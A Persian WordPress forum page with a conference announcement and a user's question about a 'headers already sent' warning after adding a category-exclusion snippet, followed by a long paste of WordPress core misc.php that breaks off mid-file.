• اطلاعیه ها

  • Saeed Fard

   برگزاری چهارمین همایش Coder Conf و کد تخفیف برای کاربران وردپرس پارسی   20/04/97

   کدرکانف هر سال در آخرین پنجشنبه مرداد با بورد‌های مختلفی برگزار می‌گردد،امسال نیز کدرکانف در همین تاریخ با حضور برنامه نویسان مطرح کشور در بورد تخصصی جاوااسکریپت برگزار خواهد شد، یک گردهمایی متفاوت با طعم Javascript. Coderconf هر سال نسبت به سال‌های گذشته با حضور برنامه‌نویسان پر رنگتر می‌شود. ما سعی کردیم هر ساله به این کنفرانس مفهوم عمیق تری ببخشیم تا از آنچه در سال‌های گذشته عرضه شده به روزتر و مفیدتر واقع شویم. امسال فرصتی خواهد بود تا با نگرشی جدید و بهبود مطالب ارائه شده، عمیقتر به این موضوع نگاه کنیم تا بجای تکرار مباحث پیشین گامی هر چند کوچک در مسیر ارتقای دانش فنی برنامه‌نویسان ایرانی برداریم. ما در Coderconf ۴ با تمرکز بر روی Javascript نیت کرده‌ایم این فرصت را در اختیار برنامه نویسان قرار دهیم تا با ظرافت و استانداردهای روز دنیا کار خود را پیش ببرند. به نظر ما امسال زمان آن فرا رسیده‌است تا این زبان را به صورت تخصصی و از ابعاد مختلف به چالش بکشیم.   دبیر علمی همایش میلاد حیدری، کدرکانف ۴ را اینگونه توصیف کرده است :اشتراک گذاری دانش بهترین راه رسیدن به جاودانگی اطلاعات است. هر ساله همایش‌های زیادی برگزار میشه که افراد شرکت‌کننده می‌توانند با افراد مجرب شبکه سازی کنند. امسال در کدرکانف سعی کردیم علاوه بر بخش شبکه سازی بین افراد بیشتر روی انتقال دانش و کیفیت ارائه ها تمرکز داشته باشیم . به قصد یک گردهمایی بلند مدت بین برنامه‌نویسان جاوااسکریپت که با هم تبادل دانش و اطلاعات کنند گردهم آییم.
   بنده به عنوان عضو کوچکی از جامعه برنامه‌نویسان جاوااسکریپت ایران امیدوارم در کدرکانف امسال علاوه بر شبکه سازی، از اطلاعاتی که دوستان در این همایش در اختیارتان قرار می‌دهند استفاده کنید. در سایت همایش میتوانید سخنرانان و موضوع پنل همایش کدرکانف رو مشاهده کنید . علاقه‌مندان به حضور در این همایش می‌توانند با کد تخفیف wpparsi اقدام به ثبت نام در این گردهمایی کنند. سایت همایش :‌http://coderconf.org
   بلیط فروشی همایش :‌https://evand.com/events/coderconf4  
hassannak

خطا در کد misc.php وردپرس

2 پست در این موضوع قرار دارد

با سلام 

مین میخواستم در سایتم یکی از دسته های خاص در صحفه اصلی نمایش داده نشه و این کد را گذاشتم 

<?php
// Hide contents of a specific batch in Home
function exclude_category_home( $query ) {
if ( $query->is_home ) {
$query->set( 'cat', '-7,-1' );
}
return $query;
}
add_filter( 'pre_get_posts', 'exclude_category_home' );
?>

ولی نمیدونم چرا هنگام وارد کردن ای دی دسته وردپرس این خطا را میده 

 

Warning: Cannot modify header information - headers already sent by (output started at /mp3old.ir/wp-content/themes/Novindownload1/functions.php:18) in /home/bobocom/mp3old.ir/wp-admin/includes/misc.php on line 1116

 

این فایل mise.php 

<?php
/**
 * Misc WordPress Administration API.
 *
 * @package WordPress
 * @subpackage Administration
 */

/**
 * Returns whether the server is running Apache with the mod_rewrite module loaded.
 *
 * @since 2.0.0
 *
 * @return bool
 */
function got_mod_rewrite() {
	$got_rewrite = apache_mod_loaded('mod_rewrite', true);

	/**
	 * Filters whether Apache and mod_rewrite are present.
	 *
	 * This filter was previously used to force URL rewriting for other servers,
	 * like nginx. Use the {@see 'got_url_rewrite'} filter in got_url_rewrite() instead.
	 *
	 * @since 2.5.0
	 *
	 * @see got_url_rewrite()
	 *
	 * @param bool $got_rewrite Whether Apache and mod_rewrite are present.
	 */
	return apply_filters( 'got_rewrite', $got_rewrite );
}

/**
 * Returns whether the server supports URL rewriting.
 *
 * Detects Apache's mod_rewrite, IIS 7.0+ permalink support, and nginx.
 *
 * @since 3.7.0
 *
 * @global bool $is_nginx
 *
 * @return bool Whether the server supports URL rewriting.
 */
function got_url_rewrite() {
	$got_url_rewrite = ( got_mod_rewrite() || $GLOBALS['is_nginx'] || iis7_supports_permalinks() );

	/**
	 * Filters whether URL rewriting is available.
	 *
	 * @since 3.7.0
	 *
	 * @param bool $got_url_rewrite Whether URL rewriting is available.
	 */
	return apply_filters( 'got_url_rewrite', $got_url_rewrite );
}

/**
 * Extracts strings from between the BEGIN and END markers in the .htaccess file.
 *
 * @since 1.5.0
 *
 * @param string $filename
 * @param string $marker
 * @return array An array of strings from a file (.htaccess ) from between BEGIN and END markers.
 */
function extract_from_markers( $filename, $marker ) {
	$result = array ();

	if ( ! file_exists( $filename ) ) {
		return $result;
	}

	$markerdata = explode( "\n", implode( '', file( $filename ) ) );

	$state = false;
	foreach ( $markerdata as $markerline ) {
		if ( false !== strpos( $markerline, '# END ' . $marker ) ) {
			$state = false;
		}
		if ( $state ) {
			$result[] = $markerline;
		}
		if ( false !== strpos( $markerline, '# BEGIN ' . $marker ) ) {
			$state = true;
		}
	}

	return $result;
}

/**
 * Inserts an array of strings into a file (.htaccess ), placing it between
 * BEGIN and END markers.
 *
 * Replaces existing marked info. Retains surrounding
 * data. Creates file if none exists.
 *
 * @since 1.5.0
 *
 * @param string    $filename Filename to alter.
 * @param string    $marker  The marker to alter.
 * @param array|string $insertion The new content to insert.
 * @return bool True on write success, false on failure.
 */
function insert_with_markers( $filename, $marker, $insertion ) {
	if ( ! file_exists( $filename ) ) {
		if ( ! is_writable( dirname( $filename ) ) ) {
			return false;
		}
		if ( ! touch( $filename ) ) {
			return false;
		}
	} elseif ( ! is_writeable( $filename ) ) {
		return false;
	}

	if ( ! is_array( $insertion ) ) {
		$insertion = explode( "\n", $insertion );
	}

	$start_marker = "# BEGIN {$marker}";
	$end_marker  = "# END {$marker}";

	$fp = fopen( $filename, 'r+' );
	if ( ! $fp ) {
		return false;
	}

	// Attempt to get a lock. If the filesystem supports locking, this will block until the lock is acquired.
	flock( $fp, LOCK_EX );

	$lines = array();
	while ( ! feof( $fp ) ) {
		$lines[] = rtrim( fgets( $fp ), "\r\n" );
	}

	// Split out the existing file into the preceding lines, and those that appear after the marker
	$pre_lines = $post_lines = $existing_lines = array();
	$found_marker = $found_end_marker = false;
	foreach ( $lines as $line ) {
		if ( ! $found_marker && false !== strpos( $line, $start_marker ) ) {
			$found_marker = true;
			continue;
		} elseif ( ! $found_end_marker && false !== strpos( $line, $end_marker ) ) {
			$found_end_marker = true;
			continue;
		}
		if ( ! $found_marker ) {
			$pre_lines[] = $line;
		} elseif ( $found_marker && $found_end_marker ) {
			$post_lines[] = $line;
		} else {
			$existing_lines[] = $line;
		}
	}

	// Check to see if there was a change
	if ( $existing_lines === $insertion ) {
		flock( $fp, LOCK_UN );
		fclose( $fp );

		return true;
	}

	// Generate the new file data
	$new_file_data = implode( "\n", array_merge(
		$pre_lines,
		array( $start_marker ),
		$insertion,
		array( $end_marker ),
		$post_lines
	) );

	// Write to the start of the file, and truncate it to that length
	fseek( $fp, 0 );
	$bytes = fwrite( $fp, $new_file_data );
	if ( $bytes ) {
		ftruncate( $fp, ftell( $fp ) );
	}
	fflush( $fp );
	flock( $fp, LOCK_UN );
	fclose( $fp );

	return (bool) $bytes;
}

/**
 * Updates the htaccess file with the current rules if it is writable.
 *
 * Always writes to the file if it exists and is writable to ensure that we
 * blank out old rules.
 *
 * @since 1.5.0
 *
 * @global WP_Rewrite $wp_rewrite
 */
function save_mod_rewrite_rules() {
	if ( is_multisite() )
		return;

	global $wp_rewrite;

	$home_path = get_home_path();
	$htaccess_file = $home_path.'.htaccess';

	/*
	 * If the file doesn't already exist check for write access to the directory
	 * and whether we have some rules. Else check for write access to the file.
	 */
	if ((!file_exists($htaccess_file) && is_writable($home_path) && $wp_rewrite->using_mod_rewrite_permalinks()) || is_writable($htaccess_file)) {
		if ( got_mod_rewrite() ) {
			$rules = explode( "\n", $wp_rewrite->mod_rewrite_rules() );
			return insert_with_markers( $htaccess_file, 'WordPress', $rules );
		}
	}

	return false;
}

/**
 * Updates the IIS web.config file with the current rules if it is writable.
 * If the permalinks do not require rewrite rules then the rules are deleted from the web.config file.
 *
 * @since 2.8.0
 *
 * @global WP_Rewrite $wp_rewrite
 *
 * @return bool True if web.config was updated successfully
 */
function iis7_save_url_rewrite_rules(){
	if ( is_multisite() )
		return;

	global $wp_rewrite;

	$home_path = get_home_path();
	$web_config_file = $home_path . 'web.config';

	// Using win_is_writable() instead of is_writable() because of a bug in Windows PHP
	if ( iis7_supports_permalinks() && ( ( ! file_exists($web_config_file) && win_is_writable($home_path) && $wp_rewrite->using_mod_rewrite_permalinks() ) || win_is_writable($web_config_file) ) ) {
		$rule = $wp_rewrite->iis7_url_rewrite_rules(false, '', '');
		if ( ! empty($rule) ) {
			return iis7_add_rewrite_rule($web_config_file, $rule);
		} else {
			return iis7_delete_rewrite_rule($web_config_file);
		}
	}
	return false;
}

/**
 * Update the "recently-edited" file for the plugin or theme editor.
 *
 * @since 1.5.0
 *
 * @param string $file
 */
function update_recently_edited( $file ) {
	$oldfiles = (array ) get_option( 'recently_edited' );
	if ( $oldfiles ) {
		$oldfiles = array_reverse( $oldfiles );
		$oldfiles[] = $file;
		$oldfiles = array_reverse( $oldfiles );
		$oldfiles = array_unique( $oldfiles );
		if ( 5 < count( $oldfiles ))
			array_pop( $oldfiles );
	} else {
		$oldfiles[] = $file;
	}
	update_option( 'recently_edited', $oldfiles );
}

/**
 * Makes a tree structure for the Theme Editor's file list.
 *
 * @since 4.9.0
 * @access private
 *
 * @param array $allowed_files List of theme file paths.
 * @return array Tree structure for listing theme files.
 */
function wp_make_theme_file_tree( $allowed_files ) {
	$tree_list = array();
	foreach ( $allowed_files as $file_name => $absolute_filename ) {
		$list = explode( '/', $file_name );
		$last_dir = &$tree_list;
		foreach ( $list as $dir ) {
			$last_dir =& $last_dir[ $dir ];
		}
		$last_dir = $file_name;
	}
	return $tree_list;
}

/**
 * Outputs the formatted file list for the Theme Editor.
 *
 * @since 4.9.0
 * @access private
 *
 * @param array|string $tree List of file/folder paths, or filename.
 * @param int     $level The aria-level for the current iteration.
 * @param int     $size The aria-setsize for the current iteration.
 * @param int     $index The aria-posinset for the current iteration.
 */
function wp_print_theme_file_tree( $tree, $level = 2, $size = 1, $index = 1 ) {
	global $relative_file, $stylesheet;

	if ( is_array( $tree ) ) {
		$index = 0;
		$size = count( $tree );
		foreach ( $tree as $label => $theme_file ) :
			$index++;
			if ( ! is_array( $theme_file ) ) {
				wp_print_theme_file_tree( $theme_file, $level, $index, $size );
				continue;
			}
			?>
			<li role="treeitem" aria-expanded="true" tabindex="-1"
				aria-level="<?php echo esc_attr( $level ); ?>"
				aria-setsize="<?php echo esc_attr( $size ); ?>"
				aria-posinset="<?php echo esc_attr( $index ); ?>">
				<span class="folder-label"><?php echo esc_html( $label ); ?> <span class="screen-reader-text"><?php _e( 'folder' ); ?></span><span aria-hidden="true" class="icon"></span></span>
				<ul role="group" class="tree-folder"><?php wp_print_theme_file_tree( $theme_file, $level + 1, $index, $size ); ?></ul>
			</li>
			<?php
		endforeach;
	} else {
		$filename = $tree;
		$url = add_query_arg(
			array(
				'file' => rawurlencode( $tree ),
				'theme' => rawurlencode( $stylesheet ),
			),
			self_admin_url( 'theme-editor.php' )
		);
		?>
		<li role="none" class="<?php echo esc_attr( $relative_file === $filename ? 'current-file' : '' ); ?>">
			<a role="treeitem" tabindex="<?php echo esc_attr( $relative_file === $filename ? '0' : '-1' ); ?>"
				href="<?php echo esc_url( $url ); ?>"
				aria-level="<?php echo esc_attr( $level ); ?>"
				aria-setsize="<?php echo esc_attr( $size ); ?>"
				aria-posinset="<?php echo esc_attr( $index ); ?>">
				<?php
				$file_description = esc_html( get_file_description( $filename ) );
				if ( $file_description !== $filename && basename( $filename ) !== $file_description ) {
					$file_description .= '<br /><span class="nonessential">(' . esc_html( $filename ) . ')</span>';
				}

				if ( $relative_file === $filename ) {
					echo '<span class="notice notice-info">' . $file_description . '</span>';
				} else {
					echo $file_description;
				}
				?>
			</a>
		</li>
		<?php
	}
}

/**
 * Makes a tree structure for the Plugin Editor's file list.
 *
 * @since 4.9.0
 * @access private
 *
 * @param string $plugin_editable_files List of plugin file paths.
 * @return array Tree structure for listing plugin files.
 */
function wp_make_plugin_file_tree( $plugin_editable_files ) {
	$tree_list = array();
	foreach ( $plugin_editable_files as $plugin_file ) {
		$list = explode( '/', preg_replace( '#^.+?/#', '', $plugin_file ) );
		$last_dir = &$tree_list;
		foreach ( $list as $dir ) {
			$last_dir =& $last_dir[ $dir ];
		}
		$last_dir = $plugin_file;
	}
	return $tree_list;
}

/**
 * Outputs the formatted file list for the Plugin Editor.
 *
 * @since 4.9.0
 * @access private
 *
 * @param array|string $tree List of file/folder paths, or filename.
 * @param string    $label Name of file or folder to print.
 * @param int     $level The aria-level for the current iteration.
 * @param int     $size The aria-setsize for the current iteration.
 * @param int     $index The aria-posinset for the current iteration.
 */
function wp_print_plugin_file_tree( $tree, $label = '', $level = 2, $size = 1, $index = 1 ) {
	global $file, $plugin;
	if ( is_array( $tree ) ) {
		$index = 0;
		$size = count( $tree );
		foreach ( $tree as $label => $plugin_file ) :
			$index++;
			if ( ! is_array( $plugin_file ) ) {
				wp_print_plugin_file_tree( $plugin_file, $label, $level, $index, $size );
				continue;
			}
			?>
			<li role="treeitem" aria-expanded="true" tabindex="-1"
				aria-level="<?php echo esc_attr( $level ); ?>"
				aria-setsize="<?php echo esc_attr( $size ); ?>"
				aria-posinset="<?php echo esc_attr( $index ); ?>">
				<span class="folder-label"><?php echo esc_html( $label ); ?> <span class="screen-reader-text"><?php _e( 'folder' ); ?></span><span aria-hidden="true" class="icon"></span></span>
				<ul role="group" class="tree-folder"><?php wp_print_plugin_file_tree( $plugin_file, '', $level + 1, $index, $size ); ?></ul>
			</li>
			<?php
		endforeach;
	} else {
		$url = add_query_arg(
			array(
				'file' => rawurlencode( $tree ),
				'plugin' => rawurlencode( $plugin ),
			),
			self_admin_url( 'plugin-editor.php' )
		);
		?>
		<li role="none" class="<?php echo esc_attr( $file === $tree ? 'current-file' : '' ); ?>">
			<a role="treeitem" tabindex="<?php echo esc_attr( $file === $tree ? '0' : '-1' ); ?>"
				href="<?php echo esc_url( $url ); ?>"
				aria-level="<?php echo esc_attr( $level ); ?>"
				aria-setsize="<?php echo esc_attr( $size ); ?>"
				aria-posinset="<?php echo esc_attr( $index ); ?>">
				<?php
				if ( $file === $tree ) {
					echo '<span class="notice notice-info">' . esc_html( $label ) . '</span>';
				} else {
					echo esc_html( $label );
				}
				?>
			</a>
		</li>
		<?php
	}
}

/**
 * Flushes rewrite rules if siteurl, home or page_on_front changed.
 *
 * @since 2.1.0
 *
 * @param string $old_value
 * @param string $value
 */
function update_home_siteurl( $old_value, $value ) {
	if ( wp_installing() )
		return;

	if ( is_multisite() && ms_is_switched() ) {
		delete_option( 'rewrite_rules' );
	} else {
		flush_rewrite_rules();
	}
}


/**
 * Resets global variables based on $_GET and $_POST
 *
 * This function resets global variables based on the names passed
 * in the $vars array to the value of $_POST[$var] or $_GET[$var] or ''
 * if neither is defined.
 *
 * @since 2.0.0
 *
 * @param array $vars An array of globals to reset.
 */
function wp_reset_vars( $vars ) {
	foreach ( $vars as $var ) {
		if ( empty( $_POST[ $var ] ) ) {
			if ( empty( $_GET[ $var ] ) ) {
				$GLOBALS[ $var ] = '';
			} else {
				$GLOBALS[ $var ] = $_GET[ $var ];
			}
		} else {
			$GLOBALS[ $var ] = $_POST[ $var ];
		}
	}
}

/**
 * Displays the given administration message.
 *
 * @since 2.1.0
 *
 * @param string|WP_Error $message
 */
function show_message($message) {
	if ( is_wp_error($message) ){
		if ( $message->get_error_data() && is_string( $message->get_error_data() ) )
			$message = $message->get_error_message() . ': ' . $message->get_error_data();
		else
			$message = $message->get_error_message();
	}
	echo "<p>$message</p>\n";
	wp_ob_end_flush_all();
	flush();
}

/**
 * @since 2.8.0
 *
 * @param string $content
 * @return array
 */
function wp_doc_link_parse( $content ) {
	if ( !is_string( $content ) || empty( $content ) )
		return array();

	if ( !function_exists('token_get_all') )
		return array();

	$tokens = token_get_all( $content );
	$count = count( $tokens );
	$functions = array();
	$ignore_functions = array();
	for ( $t = 0; $t < $count - 2; $t++ ) {
		if ( ! is_array( $tokens[ $t ] ) ) {
			continue;
		}

		if ( T_STRING == $tokens[ $t ][0] && ( '(' == $tokens[ $t + 1 ] || '(' == $tokens[ $t + 2 ] ) ) {
			// If it's a function or class defined locally, there's not going to be any docs available
			if ( ( isset( $tokens[ $t - 2 ][1] ) && in_array( $tokens[ $t - 2 ][1], array( 'function', 'class' ) ) ) || ( isset( $tokens[ $t - 2 ][0] ) && T_OBJECT_OPERATOR == $tokens[ $t - 1 ][0] ) ) {
				$ignore_functions[] = $tokens[$t][1];
			}
			// Add this to our stack of unique references
			$functions[] = $tokens[$t][1];
		}
	}

	$functions = array_unique( $functions );
	sort( $functions );

	/**
	 * Filters the list of functions and classes to be ignored from the documentation lookup.
	 *
	 * @since 2.8.0
	 *
	 * @param array $ignore_functions Functions and classes to be ignored.
	 */
	$ignore_functions = apply_filters( 'documentation_ignore_functions', $ignore_functions );

	$ignore_functions = array_unique( $ignore_functions );

	$out = array();
	foreach ( $functions as $function ) {
		if ( in_array( $function, $ignore_functions ) )
			continue;
		$out[] = $function;
	}

	return $out;
}

/**
 * Saves option for number of rows when listing posts, pages, comments, etc.
 *
 * @since 2.8.0
 */
function set_screen_options() {

	if ( isset($_POST['wp_screen_options']) && is_array($_POST['wp_screen_options']) ) {
		check_admin_referer( 'screen-options-nonce', 'screenoptionnonce' );

		if ( !$user = wp_get_current_user() )
			return;
		$option = $_POST['wp_screen_options']['option'];
		$value = $_POST['wp_screen_options']['value'];

		if ( $option != sanitize_key( $option ) )
			return;

		$map_option = $option;
		$type = str_replace('edit_', '', $map_option);
		$type = str_replace('_per_page', '', $type);
		if ( in_array( $type, get_taxonomies() ) )
			$map_option = 'edit_tags_per_page';
		elseif ( in_array( $type, get_post_types() ) )
			$map_option = 'edit_per_page';
		else
			$option = str_replace('-', '_', $option);

		switch ( $map_option ) {
			case 'edit_per_page':
			case 'users_per_page':
			case 'edit_comments_per_page':
			case 'upload_per_page':
			case 'edit_tags_per_page':
			case 'plugins_per_page':
			// Network admin
			case 'sites_network_per_page':
			case 'users_network_per_page':
			case 'site_users_network_per_page':
			case 'plugins_network_per_page':
			case 'themes_network_per_page':
			case 'site_themes_network_per_page':
				$value = (int) $value;
				if ( $value < 1 || $value > 999 )
					return;
				break;
			default:

				/**
				 * Filters a screen option value before it is set.
				 *
				 * The filter can also be used to modify non-standard [items]_per_page
				 * settings. See the parent function for a full list of standard options.
				 *
				 * Returning false to the filter will skip saving the current option.
				 *
				 * @since 2.8.0
				 *
				 * @see set_screen_options()
				 *
				 * @param bool|int $value Screen option value. Default false to skip.
				 * @param string  $option The option name.
				 * @param int   $value The number of rows to use.
				 */
				$value = apply_filters( 'set-screen-option', false, $option, $value );

				if ( false === $value )
					return;
				break;
		}

		update_user_meta($user->ID, $option, $value);

		$url = remove_query_arg( array( 'pagenum', 'apage', 'paged' ), wp_get_referer() );
		if ( isset( $_POST['mode'] ) ) {
			$url = add_query_arg( array( 'mode' => $_POST['mode'] ), $url );
		}

		wp_safe_redirect( $url );
		exit;
	}
}

/**
 * Check if rewrite rule for WordPress already exists in the IIS 7+ configuration file
 *
 * @since 2.8.0
 *
 * @return bool
 * @param string $filename The file path to the configuration file
 */
function iis7_rewrite_rule_exists($filename) {
	if ( ! file_exists($filename) )
		return false;
	if ( ! class_exists( 'DOMDocument', false ) ) {
		return false;
	}

	$doc = new DOMDocument();
	if ( $doc->load($filename) === false )
		return false;
	$xpath = new DOMXPath($doc);
	$rules = $xpath->query('/configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'wordpress\')] | /configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'WordPress\')]');
	if ( $rules->length == 0 )
		return false;
	else
		return true;
}

/**
 * Delete WordPress rewrite rule from web.config file if it exists there
 *
 * @since 2.8.0
 *
 * @param string $filename Name of the configuration file
 * @return bool
 */
function iis7_delete_rewrite_rule($filename) {
	// If configuration file does not exist then rules also do not exist so there is nothing to delete
	if ( ! file_exists($filename) )
		return true;

	if ( ! class_exists( 'DOMDocument', false ) ) {
		return false;
	}

	$doc = new DOMDocument();
	$doc->preserveWhiteSpace = false;

	if ( $doc -> load($filename) === false )
		return false;
	$xpath = new DOMXPath($doc);
	$rules = $xpath->query('/configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'wordpress\')] | /configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'WordPress\')]');
	if ( $rules->length > 0 ) {
		$child = $rules->item(0);
		$parent = $child->parentNode;
		$parent->removeChild($child);
		$doc->formatOutput = true;
		saveDomDocument($doc, $filename);
	}
	return true;
}

/**
 * Add WordPress rewrite rule to the IIS 7+ configuration file.
 *
 * @since 2.8.0
 *
 * @param string $filename The file path to the configuration file
 * @param string $rewrite_rule The XML fragment with URL Rewrite rule
 * @return bool
 */
function iis7_add_rewrite_rule($filename, $rewrite_rule) {
	if ( ! class_exists( 'DOMDocument', false ) ) {
		return false;
	}

	// If configuration file does not exist then we create one.
	if ( ! file_exists($filename) ) {
		$fp = fopen( $filename, 'w');
		fwrite($fp, '<configuration/>');
		fclose($fp);
	}

	$doc = new DOMDocument();
	$doc->preserveWhiteSpace = false;

	if ( $doc->load($filename) === false )
		return false;

	$xpath = new DOMXPath($doc);

	// First check if the rule already exists as in that case there is no need to re-add it
	$wordpress_rules = $xpath->query('/configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'wordpress\')] | /configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'WordPress\')]');
	if ( $wordpress_rules->length > 0 )
		return true;

	// Check the XPath to the rewrite rule and create XML nodes if they do not exist
	$xmlnodes = $xpath->query('/configuration/system.webServer/rewrite/rules');
	if ( $xmlnodes->length > 0 ) {
		$rules_node = $xmlnodes->item(0);
	} else {
		$rules_node = $doc->createElement('rules');

		$xmlnodes = $xpath->query('/configuration/system.webServer/rewrite');
		if ( $xmlnodes->length > 0 ) {
			$rewrite_node = $xmlnodes->item(0);
			$rewrite_node->appendChild($rules_node);
		} else {
			$rewrite_node = $doc->createElement('rewrite');
			$rewrite_node->appendChild($rules_node);

			$xmlnodes = $xpath->query('/configuration/system.webServer');
			if ( $xmlnodes->length > 0 ) {
				$system_webServer_node = $xmlnodes->item(0);
				$system_webServer_node->appendChild($rewrite_node);
			} else {
				$system_webServer_node = $doc->createElement('system.webServer');
				$system_webServer_node->appendChild($rewrite_node);

				$xmlnodes = $xpath->query('/configuration');
				if ( $xmlnodes->length > 0 ) {
					$config_node = $xmlnodes->item(0);
					$config_node->appendChild($system_webServer_node);
				} else {
					$config_node = $doc->createElement('configuration');
					$doc->appendChild($config_node);
					$config_node->appendChild($system_webServer_node);
				}
			}
		}
	}

	$rule_fragment = $doc->createDocumentFragment();
	$rule_fragment->appendXML($rewrite_rule);
	$rules_node->appendChild($rule_fragment);

	$doc->encoding = "UTF-8";
	$doc->formatOutput = true;
	saveDomDocument($doc, $filename);

	return true;
}

/**
 * Saves the XML document into a file
 *
 * @since 2.8.0
 *
 * @param DOMDocument $doc
 * @param string $filename
 */
function saveDomDocument($doc, $filename) {
	$config = $doc->saveXML();
	$config = preg_replace("/([^\r])\n/", "$1\r\n", $config);
	$fp = fopen($filename, 'w');
	fwrite($fp, $config);
	fclose($fp);
}

/**
 * Display the default admin color scheme picker (Used in user-edit.php)
 *
 * @since 3.0.0
 *
 * @global array $_wp_admin_css_colors
 *
 * @param int $user_id User ID.
 */
function admin_color_scheme_picker( $user_id ) {
	global $_wp_admin_css_colors;

	ksort( $_wp_admin_css_colors );

	if ( isset( $_wp_admin_css_colors['fresh'] ) ) {
		// Set Default ('fresh') and Light should go first.
		$_wp_admin_css_colors = array_filter( array_merge( array( 'fresh' => '', 'light' => '' ), $_wp_admin_css_colors ) );
	}

	$current_color = get_user_option( 'admin_color', $user_id );

	if ( empty( $current_color ) || ! isset( $_wp_admin_css_colors[ $current_color ] ) ) {
		$current_color = 'fresh';
	}

	?>
	<fieldset id="color-picker" class="scheme-list">
		<legend class="screen-reader-text"><span><?php _e( 'Admin Color Scheme' ); ?></span></legend>
		<?php
		wp_nonce_field( 'save-color-scheme', 'color-nonce', false );
		foreach ( $_wp_admin_css_colors as $color => $color_info ) :

			?>
			<div class="color-option <?php echo ( $color == $current_color ) ? 'selected' : ''; ?>">
				<input name="admin_color" id="admin_color_<?php echo esc_attr( $color ); ?>" type="radio" value="<?php echo esc_attr( $color ); ?>" class="tog" <?php checked( $color, $current_color ); ?> />
				<input type="hidden" class="css_url" value="<?php echo esc_url( $color_info->url ); ?>" />
				<input type="hidden" class="icon_colors" value="<?php echo esc_attr( wp_json_encode( array( 'icons' => $color_info->icon_colors ) ) ); ?>" />
				<label for="admin_color_<?php echo esc_attr( $color ); ?>"><?php echo esc_html( $color_info->name ); ?></label>
				<table class="color-palette">
					<tr>
					<?php

					foreach ( $color_info->colors as $html_color ) {
						?>
						<td style="background-color: <?php echo esc_attr( $html_color ); ?>">&nbsp;</td>
						<?php
					}

					?>
					</tr>
				</table>
			</div>
			<?php

		endforeach;

	?>
	</fieldset>
	<?php
}

/**
 *
 * @global array $_wp_admin_css_colors
 */
function wp_color_scheme_settings() {
	global $_wp_admin_css_colors;

	$color_scheme = get_user_option( 'admin_color' );

	// It's possible to have a color scheme set that is no longer registered.
	if ( empty( $_wp_admin_css_colors[ $color_scheme ] ) ) {
		$color_scheme = 'fresh';
	}

	if ( ! empty( $_wp_admin_css_colors[ $color_scheme ]->icon_colors ) ) {
		$icon_colors = $_wp_admin_css_colors[ $color_scheme ]->icon_colors;
	} elseif ( ! empty( $_wp_admin_css_colors['fresh']->icon_colors ) ) {
		$icon_colors = $_wp_admin_css_colors['fresh']->icon_colors;
	} else {
		// Fall back to the default set of icon colors if the default scheme is missing.
		$icon_colors = array( 'base' => '#82878c', 'focus' => '#00a0d2', 'current' => '#fff' );
	}

	echo '<script type="text/javascript">var _wpColorScheme = ' . wp_json_encode( array( 'icons' => $icon_colors ) ) . ";</script>\n";
}

/**
 * @since 3.3.0
 */
function _ipad_meta() {
	if ( wp_is_mobile() ) {
		?>
		<meta name="viewport" id="viewport-meta" content="width=device-width, initial-scale=1">
		<?php
	}
}

/**
 * Check lock status for posts displayed on the Posts screen
 *
 * @since 3.6.0
 *
 * @param array $response The Heartbeat response.
 * @param array $data   The $_POST data sent.
 * @param string $screen_id The screen id.
 * @return array The Heartbeat response.
 */
function wp_check_locked_posts( $response, $data, $screen_id ) {
	$checked = array();

	if ( array_key_exists( 'wp-check-locked-posts', $data ) && is_array( $data['wp-check-locked-posts'] ) ) {
		foreach ( $data['wp-check-locked-posts'] as $key ) {
			if ( ! $post_id = absint( substr( $key, 5 ) ) )
				continue;

			if ( ( $user_id = wp_check_post_lock( $post_id ) ) && ( $user = get_userdata( $user_id ) ) && current_user_can( 'edit_post', $post_id ) ) {
				$send = array( 'text' => sprintf( __( '%s is currently editing' ), $user->display_name ) );

				if ( ( $avatar = get_avatar( $user->ID, 18 ) ) && preg_match( "|src='([^']+)'|", $avatar, $matches ) )
					$send['avatar_src'] = $matches[1];

				$checked[$key] = $send;
			}
		}
	}

	if ( ! empty( $checked ) )
		$response['wp-check-locked-posts'] = $checked;

	return $response;
}

/**
 * Check lock status on the New/Edit Post screen and refresh the lock
 *
 * @since 3.6.0
 *
 * @param array $response The Heartbeat response.
 * @param array $data   The $_POST data sent.
 * @param string $screen_id The screen id.
 * @return array The Heartbeat response.
 */
function wp_refresh_post_lock( $response, $data, $screen_id ) {
	if ( array_key_exists( 'wp-refresh-post-lock', $data ) ) {
		$received = $data['wp-refresh-post-lock'];
		$send = array();

		if ( ! $post_id = absint( $received['post_id'] ) )
			return $response;

		if ( ! current_user_can('edit_post', $post_id) )
			return $response;

		if ( ( $user_id = wp_check_post_lock( $post_id ) ) && ( $user = get_userdata( $user_id ) ) ) {
			$error = array(
				'text' => sprintf( __( '%s has taken over and is currently editing.' ), $user->display_name )
			);

			if ( $avatar = get_avatar( $user->ID, 64 ) ) {
				if ( preg_match( "|src='([^']+)'|", $avatar, $matches ) )
					$error['avatar_src'] = $matches[1];
			}

			$send['lock_error'] = $error;
		} else {
			if ( $new_lock = wp_set_post_lock( $post_id ) )
				$send['new_lock'] = implode( ':', $new_lock );
		}

		$response['wp-refresh-post-lock'] = $send;
	}

	return $response;
}

/**
 * Check nonce expiration on the New/Edit Post screen and refresh if needed
 *
 * @since 3.6.0
 *
 * @param array $response The Heartbeat response.
 * @param array $data   The $_POST data sent.
 * @param string $screen_id The screen id.
 * @return array The Heartbeat response.
 */
function wp_refresh_post_nonces( $response, $data, $screen_id ) {
	if ( array_key_exists( 'wp-refresh-post-nonces', $data ) ) {
		$received = $data['wp-refresh-post-nonces'];
		$response['wp-refresh-post-nonces'] = array( 'check' => 1 );

		if ( ! $post_id = absint( $received['post_id'] ) ) {
			return $response;
		}

		if ( ! current_user_can( 'edit_post', $post_id ) ) {
			return $response;
		}

		$response['wp-refresh-post-nonces'] = array(
			'replace' => array(
				'getpermalinknonce' => wp_create_nonce('getpermalink'),
				'samplepermalinknonce' => wp_create_nonce('samplepermalink'),
				'closedpostboxesnonce' => wp_create_nonce('closedpostboxes'),
				'_ajax_linking_nonce' => wp_create_nonce( 'internal-linking' ),
				'_wpnonce' => wp_create_nonce( 'update-post_' . $post_id ),
			),
			'heartbeatNonce' => wp_create_nonce( 'heartbeat-nonce' ),
		);
	}

	return $response;
}

/**
